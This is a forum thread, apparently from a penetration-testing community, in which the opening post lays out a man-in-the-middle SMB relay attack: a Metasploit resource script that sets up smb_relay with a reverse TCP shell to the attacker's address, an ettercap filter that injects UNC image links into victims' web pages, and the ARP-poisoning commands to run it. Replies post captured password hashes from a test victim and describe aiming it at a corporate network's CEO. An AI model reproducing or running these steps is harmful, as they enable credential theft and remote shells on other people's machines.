







|
#1
|
|||
|
|||
|
videos: # with ettercap http://s5.video.blip.tv/170000300628...console219.flv # Thursday, 20 September 2007 ( not with ettercap ) http://www.learnsecurityonline.com/v...ay-reverse.swf 4:42 PM 4/25/2008: "" I tried it with "Use simple file sharing" (recommended) checked...and the exploit WOULD NOT WORK. "" sadly (sometimes !?!?!?) this is checked by default so I will look into some other things ... you also want to check out the fastrack mass client side has GDI and QT exploits all in one etc ! ( this is part of the fast-track.py you must update it to current ) Firefox be design will not load a 'local share' this including \\SMB\image.jpg shares ( if anybody has a non javascript workaround please let me know FLASH also has the same security or just gets passed to firefox and then borks ) May be possible to use this trick 301 redirect the user to a local\share http://forums.remote-exploit.org/showthread.php?p=94904 What you need: * ettercap * ms framework3 * victim must have admin privs with no blank password and load an HTTP or HTTPS webpage. * only works for MIM ( LAN etc .. ) ** based on HD moore's presentation at Defcon that used WPAD http://video.google.co.uk/videoplay?...56903673801959 'Tactical Exploitation' change the IP to your IP smb.rc Code:
use exploit/windows/smb/smb_relay set PAYLOAD windows/shell_reverse_tcp set LHOST 192.168.1.90 set LPORT 21 exploit smb.filter Code:
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("</body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>" ");
replace("</Body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>" ");
msg("Filter Ran.\n");
}
etterfilter smb.filter -o smb.ef # run ettercap on target ettercap -T -q -F smb.ef -M ARP // // -P autoadd # start up msfconsole with the RC script /pentest/exploits/framework3/msfconsole -r smb.rc what happends ?? ettercap replaces IMG with \\yourip so then the victim trys to access your SMB_RELAY server for the IMG then attacker say NO access denied ! victim says OK let me try my login by default ""Great job, but I got the well-known error message, which starts so: "FAILED! The remote host has only provided us with Guest privileges....""" read the error before that error the guest error just means the auth failed Quote:
__________________
Skiddie powers activate !
Last edited by operat0r; 08-26-2008 at 11:00 AM. |
|
#2
|
||||
|
||||
|
does this only work on LAN??
__________________
|
|
#3
|
||||
|
||||
|
Very interesting ! I'm going to try it out right away.
I'll be back and tell how it went ![]() Read up on MITM (man in the middle) attacks. |
|
#4
|
||||
|
||||
|
Target: Windows XP SP0 no updates at all.
Ettercap Code:
Filter Ran. Filter Ran. Filter Ran. Filter Ran. Code:
msf exploit(smb_relay) > [*] Received 192.168.1.78:1057 \ LMHASH:00 NTHASH: OS:Windows 2002 2600 LM:Windows 2002 5.1 [*] Sending Access Denied to 192.168.1.78:1057 \ [*] Received 192.168.1.78:1057 VICTIMLOSER\Victimlooser LMHASH:93d1db444663b9c09378060fe4c2aead62db490241055c20 NTHASH:c3156deb18c7a6e6d800c39c451abcfe39baaa133d72058a OS:Windows 2002 2600 LM:Windows 2002 5.1 [*] Authenticating to 192.168.1.78 as VICTIMLOSER\Victimlooser... [*] Failed to authenticate as VICTIMLOSER\Victimlooser... I'm not sure if plain-text links are allowed. Just trying to keep you out of trouble ![]() Last edited by Deathray; 03-26-2008 at 10:58 PM. |
|
#5
|
||||
|
||||
|
Couple of questions:
Must file sharing be enabled on the victim as mentioned in the presentation? Is this for IE only? I'm seeing IE using <img src="\\ip\share\i.jpg> while Firefox is mozicon-url:file:////ip/share/i.jpg |
|
#6
|
|||
|
|||
|
humm ill try it with FF and add the code if it works thanks !
|
|
#7
|
||||
|
||||
|
Nice little audit, I wrote a tut similar to this last October check it out.
http://forum.remote-exploit.org/show...?t=9121&page=2
__________________
Backtrack 3 pimp daddy. Kernel 2.6.25.1 slackware 12.1, Compiz fusion 0.7.4, lots of new tools, Customized backtrack menu. |
|
#8
|
||||
|
||||
|
Can you clarify how this will affect a corporate network? Will all clients be routed through my client by default or can you limit it to those that type in your IP address in the web browser?
|
|
#9
|
|||
|
|||
|
Can you clarify how this will affect a corporate network?
total ownage if they have admin rights ( why ? because nobody has a blank password in a corp LAN ) Will all clients be routed through my client by default or can you limit it to those that type in your IP address in the web browser? you need to read how MIM works and also read up on ettercap how it works etc simply just make a target list insted of // // use the target IP /victomloser_CEO/ // |
|
#10
|
|||
|
|||
|
Quote:
http://rmccurdy.com/scripts/videos/q...3%20msfweb.swf |
![]() |
| Thread Tools | |
| Display Modes | |
|
|